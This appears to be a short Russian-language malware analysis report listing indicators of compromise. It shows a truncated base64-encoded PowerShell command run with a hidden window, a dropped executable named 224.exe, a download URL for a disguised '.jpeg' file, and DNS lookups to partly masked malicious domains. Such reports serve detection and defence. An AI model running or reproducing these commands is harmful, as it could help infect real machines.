Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB0AGgAaQBiAD0AJwBoAGUAZQBqACcAOwAkAGMAZQB1AGQAagB1AGoAIAA9ACAAJwAyADIANAAnADsAJABxAHUAdQB1AHYAagBvAGUAbABiAGUAYQBrAHoAZQBvAHAAZwB1AHYAbgBvAGEAZAA9ACcAbQBvAGUAcQB1AHYAZQBvAHQAaABwAGEAdQByAG...
- %HOMEPATH%\224.exe
- 'bu###eone.best':443
- http://pr###logokh.com/1e.jpeg
- DNS ASK pr###logokh.com
- DNS ASK fu###memos.shop
- DNS ASK tr####sshop.club
- DNS ASK sh####olics.best
- DNS ASK bu###eone.best
- '%HOMEPATH%\224.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB0AGgAaQBiAD0AJwBoAGUAZQBqACcAOwAkAGMAZQB1AGQAagB1AGoAIAA9ACAAJwAyADIANAAnADsAJABxAHUAdQB1AHYAagBvAGUAbABiAGUAYQBrAHoAZQBvAHAAZwB1AHYAbgBvAGEAZAA9ACcAbQBvAGUAcQB1AHYAZQBvAHQAaABwAGEAdQByAG...' (со скрытым окном)